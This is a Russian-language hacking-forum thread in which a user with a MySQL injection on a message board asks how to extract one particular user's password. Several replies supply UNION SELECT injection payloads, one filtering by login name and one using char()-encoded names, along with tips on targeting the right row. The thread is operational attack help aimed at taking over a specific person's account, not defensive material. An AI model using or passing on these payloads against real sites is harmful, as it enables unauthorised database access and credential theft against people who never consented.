Есть MySQL-inj , в базе дофигища юзеров а мне нужен пасс конкретно одного (не админа), как можно составить запрос чтоб выдало пасс конкретного юзера?...допустим Code: http://test.com/board/rept.php?id=-1+union+select+concat(login,0x3a,password),0,0,0+from+chat_users/* Выдаст нейм:пасс, а как сделать чтоб конкретного юзера? p.s. limit не предлагать))(Выдает только по одному)
Ты определись. Узнай порядковый номер пользователя в базе и составь запрос.... Ну или: ...from+chat_users+where+login=char(ися пользователя в char`е)/*
попробуй так так Code: -1+union+select+concat(password),0,0,0+from+chat_users+where+login='name'/* где name имя нужно юзера
судя по твоему форуму/доске у тя участвует ид пользователя ну вот найди линк на его репутацию и используй запрос где вместо [value] вставь значение ид
Угу невероятно дельный совет, зачем что то говорить и советовать если сам это не знаешь? Перебирать лимитом крайне не рационально: 1) Если запись пользователя тысячная или даже сотая, то это займет очень много времени 2) Даже если знать id пользователя (кстати далеко не обязательно что такой параметр есть именно в таблице с пользователями) то далеко не обязательно что id пользователя совпадет с номером записи Здесь надо было делать: Вообще так и только так, а не искать порядковые номера и т.д. - все должно быть сделано максимально рационально. p.s Qwertison - юзай пожалуйста поиск ты почти каждый день создаёшь темы, а нужную инфу легко найти в статьях, да и тему "Ваши вопросы по уязвимостям." никто не отменял, здавай такие вопросы в ней.
